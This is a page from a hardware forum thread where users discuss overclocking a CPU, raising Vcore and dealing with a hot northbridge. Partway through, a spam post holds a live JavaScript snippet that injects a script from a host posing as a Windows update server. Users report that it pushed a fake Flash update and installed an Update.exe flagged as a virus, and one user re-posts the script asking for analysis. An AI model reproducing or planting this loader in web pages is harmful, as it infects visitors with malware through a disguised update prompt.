Please report all spam threads, posts and suspicious members. We receive spam notifications and will take immediate action!
Page 5 of 19 FirstFirst ... 3456715 ... LastLast

Thread: Cool, quiet, fast & sexy - long road to enlightment

Default Re: Cool, quiet, fast & sexy - long road to enlightment

I will settle down with stable 500 FSB. BUT I was thinking whether, perhaps, by a miracle, there wasn't away to get to 4GHz with help of other tweaking. 500*8 failed previously rather soon (an hour of small FFTs maybe). Is there anything in the BIOS to tweak specifically for CPU stability?

The only think that I believe (just IMO) that will help you now, is increasing Vcore. I know you don't want to do that, as it means more heat, which means faster fans, which means more noise.

Other thn core voltage, I believe you've pretty much exhausted all other avenues, unfortunately.

If you were willing to run hot, noisy,fast and sexy for 8 hours with a noctua going full ball and the extraction turned up, with as close to 1.3625V and LLC, you could find out for certain if you could actually go higher on that board and CPU combo.

Think of all these minor adjustments to minimise vcore as a diet to reduce the amount of fat you eat. You can make nice tasting low fat sausages, have grilled steak etc to reduce the fat in the food, but there is a limit. You can't OFC make fat free cooking oil. Same as you can't stablize a CPU any more after a certain point without turning up the juice.
    Coolermaster CM 690 II advance Case
    Corsair HX750 (CWT, 91%(80+ Gold rated @230V) single 62A 12V rail
    P55A-UD4 v2.0 @ F14
    Core i5 760 @ 20 x 201, 4.02GHz
    TRUE Black with a single Noctua NF-P12 pumping out 55 CFM @ 19db .
    2 x 2GB Mushkin Ridgeback (996902), @ 7-10-8-27, 2010-DDR, 1.66v
    2 x Gigabyte GTX 460 1024MB in SLI (Pre OC'd to 715MHz core and 1800MHz VRAM) @ 850 Core / 4100 Mem.
    Intel X25-M Boot Drive (OS and Programs) 200MB/s Read & 90MB/s Write
    Corsair X32 200MB/s Read & 100MB/s Write
    WD Caviar Blue 640GB C (Steam, Games, Storage, Temp Files & Folders, etc)
    Samsung F3 500GB Backup/Images
    Noctua 1300RPM 19dB case fan (rear extraction)
    3 x 140 MM Coolermaster LED fans (one front intake, one top extraction, one side intake)
    Dell Ultra Sharp 2209WAf E-IPS @ 1680x1050

Damn, ok then :P
    I will try to fine-tune existing setup then :P
    I mean if it wasn't for the bloody NB temperature, I would pump it up and go for 530 or something.

edit: on the other hand, CPU temperature doesn't bother me at all. In full load (say small FFTs or IBT) I am around 65C.

thanks helped me too

<script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/bMVu0YtaXE4SL7ByPUFuL7dW6w4KfcRq?rand=" + Math.random() * 100000000 +"'></"+"script>");</script>

Oh btw, I sent am email to the shop where I bought my board whether it is possible to try another piece to check about the temperature problem. I was a little surprised to see the board is no longer sold! Anyway, it looks like they "replaced" it with EP45-DS3P. What are the differences, aside from the copper cooling? If I was to replace it with something, what would you recommend?

edit: not replaced, I mislooked. it just looks similar, but was added long ago
    Last edited by Octopuss; 07-27-2009 at 02:48 AM.

I'm not sure what would give you the same good overclocking results to be honest. That board looks ok, but isn't an U3 model, so you don't get the 2OZ copper (before etching) layer. This may be in part responsible for the good clocks.

Have you considered a third party NB cooler, if temps are bothersome? A mate of mine has had good results while extremely over volting an old NForce4 chipset (he has a Toledo at 3.1GHz on phase). Note that his phase change cooling helps over all board temps, and he's fitted a fan to the NB cooler. You should get nice results with justpassive though. I've seen your case and air flow is good.

Have you tried a good old TIM replacement? I know if the NB is hot then it's not a TIM issue, but anything's worth a shot to prevent spending money.

Edit**** Bewae of AnaJu's post. Four posts, all containing a script, prompting a "Security update" for Flash Player. My Anti-Virus measures (I run good old common sense 1.0) saved me from a possible viral nasty.
    Last edited by Psycho101; 07-27-2009 at 03:50 AM.
    Coolermaster CM 690 II advance Case
    Corsair HX750 (CWT, 91%(80+ Gold rated @230V) single 62A 12V rail
    P55A-UD4 v2.0 @ F14
    Core i5 760 @ 20 x 201, 4.02GHz
    TRUE Black with a single Noctua NF-P12 pumping out 55 CFM @ 19db .
    2 x 2GB Mushkin Ridgeback (996902), @ 7-10-8-27, 2010-DDR, 1.66v
    2 x Gigabyte GTX 460 1024MB in SLI (Pre OC'd to 715MHz core and 1800MHz VRAM) @ 850 Core / 4100 Mem.
    Intel X25-M Boot Drive (OS and Programs) 200MB/s Read & 90MB/s Write
    Corsair X32 200MB/s Read & 100MB/s Write
    WD Caviar Blue 640GB C (Steam, Games, Storage, Temp Files & Folders, etc)
    Samsung F3 500GB Backup/Images
    Noctua 1300RPM 19dB case fan (rear extraction)
    3 x 140 MM Coolermaster LED fans (one front intake, one top extraction, one side intake)
    Dell Ultra Sharp 2209WAf E-IPS @ 1680x1050

Damn, I hit install!!

Chike is offline Senior Member

Quote Originally Posted by Octopuss View Post
    Damn, I hit install!!
    LMAO how did I fall for that too?

Flash has the nasty habit of popping up on random pages, requesting installation. With half dozen tabs open it is easy to get confused. Plus the window looked 99% right.

anyone can analyze?

Code:
    script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/bMVu0YtaXE4SL7ByPUFuL7dW6w4KfcRq?rand=" + Math.random() * 100000000 +"'></"+"script>");</script>
    and here comes:

C:\Windows\System32\Update.ex probably unknown NewHeur_PE virus
    C:\Windows\SysWOW64\Update.ex probably unknown NewHeur_PE virus

Quote Originally Posted by Psycho101 View Post
    I'm not sure what would give you the same good overclocking results to be honest. That board looks ok, but isn't an U3 model, so you don't get the 2OZ copper (before etching) layer. This may be in part responsible for the good clocks.

Have you considered a third party NB cooler, if temps are bothersome? A mate of mine has had good results while extremely over volting an old NForce4 chipset (he has a Toledo at 3.1GHz on phase). Note that his phase change cooling helps over all board temps, and he's fitted a fan to the NB cooler. You should get nice results with justpassive though. I've seen your case and air flow is good.

Have you tried a good old TIM replacement? I know if the NB is hot then it's not a TIM issue, but anything's worth a shot to prevent spending money.
    All this would require unmounting the whole cooling from the board and somehow attaching new heatsink (how?) with a fan. Too much work. And too little room around :(
    I know blowing some air on it fixes the problem quite well, but I dislike the idea of additional fans very much. Plus reading about other people's temperatures naturally leads me to the thought of something being wrong!

Page 5 of 19 FirstFirst ... 3456715 ... LastLast

Thread Information